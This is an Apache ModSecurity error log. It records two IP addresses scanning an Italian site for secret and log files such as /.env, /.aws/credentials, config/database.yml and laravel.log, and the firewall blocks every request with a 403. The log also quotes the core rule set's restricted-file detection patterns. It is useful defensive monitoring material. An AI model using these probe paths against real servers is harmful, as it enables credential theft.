[Fri Dec 05 22:06:12.211374 2025] [:error] [pid 535951] [client 194.180.49.174:3800] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTNJRNHtcJZozOttqkxFkwAAAAQ"]
[Fri Dec 05 22:06:12.316426 2025] [:error] [pid 540853] [client 194.180.49.174:3816] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTNJRB7iGXRBxTjfLv4OXgAAAA0"]
[Fri Dec 05 22:06:12.316656 2025] [:error] [pid 540853] [client 194.180.49.174:3816] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTNJRB7iGXRBxTjfLv4OXgAAAA0"]
[Fri Dec 05 22:06:12.316836 2025] [:error] [pid 540853] [client 194.180.49.174:3816] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTNJRB7iGXRBxTjfLv4OXgAAAA0"]
[Fri Dec 05 22:06:13.909167 2025] [:error] [pid 535951] [client 194.180.49.174:3940] [client 194.180.49.174] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTNJRdHtcJZozOttqkxFlgAAAAQ"]
[Fri Dec 05 22:06:13.909385 2025] [:error] [pid 535951] [client 194.180.49.174:3940] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTNJRdHtcJZozOttqkxFlgAAAAQ"]
[Fri Dec 05 22:06:13.909550 2025] [:error] [pid 535951] [client 194.180.49.174:3940] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTNJRdHtcJZozOttqkxFlgAAAAQ"]
[Fri Dec 05 22:06:14.089766 2025] [:error] [pid 547549] [client 194.180.49.174:3954] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "aTNJRmVdBqmrMm6mFLtGsAAAABA"]
[Fri Dec 05 22:06:14.089990 2025] [:error] [pid 547549] [client 194.180.49.174:3954] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "aTNJRmVdBqmrMm6mFLtGsAAAABA"]
[Fri Dec 05 22:06:14.090175 2025] [:error] [pid 547549] [client 194.180.49.174:3954] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "aTNJRmVdBqmrMm6mFLtGsAAAABA"]
[Fri Dec 05 22:06:14.315328 2025] [:error] [pid 542656] [client 194.180.49.174:3970] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/debug.log"] [unique_id "aTNJRqROHQbzdHbIhzc10QAAAAM"]
[Fri Dec 05 22:06:14.315693 2025] [:error] [pid 542656] [client 194.180.49.174:3970] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/debug.log"] [unique_id "aTNJRqROHQbzdHbIhzc10QAAAAM"]
[Fri Dec 05 22:06:14.315860 2025] [:error] [pid 542656] [client 194.180.49.174:3970] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/debug.log"] [unique_id "aTNJRqROHQbzdHbIhzc10QAAAAM"]
[Fri Dec 05 22:06:14.480377 2025] [:error] [pid 547546] [client 194.180.49.174:3982] [client 194.180.49.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.js"] [unique_id "aTNJRjVfWv2hMjcMNlzO_AAAAAw"]
[Fri Dec 05 22:06:14.480603 2025] [:error] [pid 547546] [client 194.180.49.174:3982] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.js"] [unique_id "aTNJRjVfWv2hMjcMNlzO_AAAAAw"]
[Fri Dec 05 22:06:14.480820 2025] [:error] [pid 547546] [client 194.180.49.174:3982] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.js"] [unique_id "aTNJRjVfWv2hMjcMNlzO_AAAAAw"]
[Fri Dec 05 22:06:14.664852 2025] [:error] [pid 547542] [client 194.180.49.174:3994] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aTNJRi5p8hwAo-ApwKs-NQAAAAE"]
[Fri Dec 05 22:06:14.665184 2025] [:error] [pid 547542] [client 194.180.49.174:3994] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aTNJRi5p8hwAo-ApwKs-NQAAAAE"]
[Fri Dec 05 22:06:14.665360 2025] [:error] [pid 547542] [client 194.180.49.174:3994] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aTNJRi5p8hwAo-ApwKs-NQAAAAE"]
[Fri Dec 05 22:06:14.773351 2025] [:error] [pid 542657] [client 194.180.49.174:4006] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aTNJRg-QLHaKzoOBZr3NWgAAAAc"]
[Fri Dec 05 22:06:14.773859 2025] [:error] [pid 542657] [client 194.180.49.174:4006] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aTNJRg-QLHaKzoOBZr3NWgAAAAc"]
[Fri Dec 05 22:06:14.774106 2025] [:error] [pid 542657] [client 194.180.49.174:4006] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aTNJRg-QLHaKzoOBZr3NWgAAAAc"]
[Fri Dec 05 22:06:14.910866 2025] [:error] [pid 535951] [client 194.180.49.174:4010] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel.log"] [unique_id "aTNJRtHtcJZozOttqkxFlwAAAAQ"]
[Fri Dec 05 22:06:14.911223 2025] [:error] [pid 535951] [client 194.180.49.174:4010] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel.log"] [unique_id "aTNJRtHtcJZozOttqkxFlwAAAAQ"]
[Fri Dec 05 22:06:14.911388 2025] [:error] [pid 535951] [client 194.180.49.174:4010] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel.log"] [unique_id "aTNJRtHtcJZozOttqkxFlwAAAAQ"]
[Fri Dec 05 22:06:15.021086 2025] [:error] [pid 540853] [client 194.180.49.174:4012] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/debug.log"] [unique_id "aTNJRx7iGXRBxTjfLv4OYgAAAA0"]
[Fri Dec 05 22:06:15.021500 2025] [:error] [pid 540853] [client 194.180.49.174:4012] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/debug.log"] [unique_id "aTNJRx7iGXRBxTjfLv4OYgAAAA0"]
[Fri Dec 05 22:06:15.021705 2025] [:error] [pid 540853] [client 194.180.49.174:4012] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/debug.log"] [unique_id "aTNJRx7iGXRBxTjfLv4OYgAAAA0"]
[Fri Dec 05 22:06:15.121023 2025] [:error] [pid 547549] [client 194.180.49.174:4026] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTNJR2VdBqmrMm6mFLtGsQAAABA"]
[Fri Dec 05 22:06:15.121524 2025] [:error] [pid 547549] [client 194.180.49.174:4026] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTNJR2VdBqmrMm6mFLtGsQAAABA"]
[Fri Dec 05 22:06:15.121756 2025] [:error] [pid 547549] [client 194.180.49.174:4026] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTNJR2VdBqmrMm6mFLtGsQAAABA"]
[Fri Dec 05 22:06:15.261850 2025] [:error] [pid 535952] [client 194.180.49.174:4042] [client 194.180.49.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/debug.log"] [unique_id "aTNJR_ITQDoZdzcYGEbPyQAAAAU"]
[Fri Dec 05 22:06:15.262396 2025] [:error] [pid 535952] [client 194.180.49.174:4042] [client 194.180.49.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/debug.log"] [unique_id "aTNJR_ITQDoZdzcYGEbPyQAAAAU"]
[Fri Dec 05 22:06:15.262644 2025] [:error] [pid 535952] [client 194.180.49.174:4042] [client 194.180.49.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/debug.log"] [unique_id "aTNJR_ITQDoZdzcYGEbPyQAAAAU"]
[Fri Dec 05 22:59:01.925393 2025] [:error] [pid 542657] [client 45.148.10.244:39822] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTNVpQ-QLHaKzoOBZr3NXwAAAAc"]
